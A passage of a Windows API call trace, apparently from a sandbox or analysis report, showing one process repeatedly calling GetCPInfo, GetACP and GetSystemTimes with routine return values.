lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.223] GetACP () returned 0x4e4 [0172.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.224] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.225] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.226] GetACP () returned 0x4e4 [0172.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.227] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.227] GetACP () returned 0x4e4 [0172.227] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.227] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.227] GetACP () returned 0x4e4 [0172.227] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.227] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.227] GetACP () returned 0x4e4 [0172.227] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.227] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.227] GetACP () returned 0x4e4 [0172.227] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.227] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.227] GetACP () returned 0x4e4 [0172.227] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.227] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.227] GetACP () returned 0x4e4 [0172.227] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.228] GetACP () returned 0x4e4 [0172.228] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.228] GetACP () returned 0x4e4 [0172.228] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.228] GetACP () returned 0x4e4 [0172.228] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.228] GetACP () returned 0x4e4 [0172.228] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.228] GetACP () returned 0x4e4 [0172.228] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.228] GetACP () returned 0x4e4 [0172.228] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.228] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.229] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.229] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.229] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.229] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.229] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.229] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.229] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.229] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.229] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.229] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.229] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.229] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.229] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.230] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.230] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.230] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.230] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.230] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.230] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.230] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.230] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.230] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.230] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.230] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.230] GetACP () returned 0x4e4 [0172.230] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.231] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.231] GetACP () returned 0x4e4 [0172.231] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.231] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.231] GetACP () returned 0x4e4 [0172.231] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.231] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.231] GetACP () returned 0x4e4 [0172.231] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.231] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.231] GetACP () returned 0x4e4 [0172.231] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.231] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.231] GetACP () returned 0x4e4 [0172.231] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.231] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.231] GetACP () returned 0x4e4 [0172.231] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.232] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.232] GetACP () returned 0x4e4 [0172.232] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.232] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.232] GetACP () returned 0x4e4 [0172.232] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.232] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.232] GetACP () returned 0x4e4 [0172.232] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.232] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.232] GetACP () returned 0x4e4 [0172.232] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.232] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.232] GetACP () returned 0x4e4 [0172.232] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.232] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.232] GetACP () returned 0x4e4 [0172.232] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.233] GetACP () returned 0x4e4 [0172.233] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.233] GetACP () returned 0x4e4 [0172.233] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.233] GetACP () returned 0x4e4 [0172.233] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.233] GetACP () returned 0x4e4 [0172.233] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.233] GetACP () returned 0x4e4 [0172.233] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.233] GetACP () returned 0x4e4 [0172.233] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.234] GetACP () returned 0x4e4 [0172.234] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.234] GetACP () returned 0x4e4 [0172.234] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.234] GetACP () returned 0x4e4 [0172.234] GetSystemTimes (in: lpIdleTime=0x18fa9c, 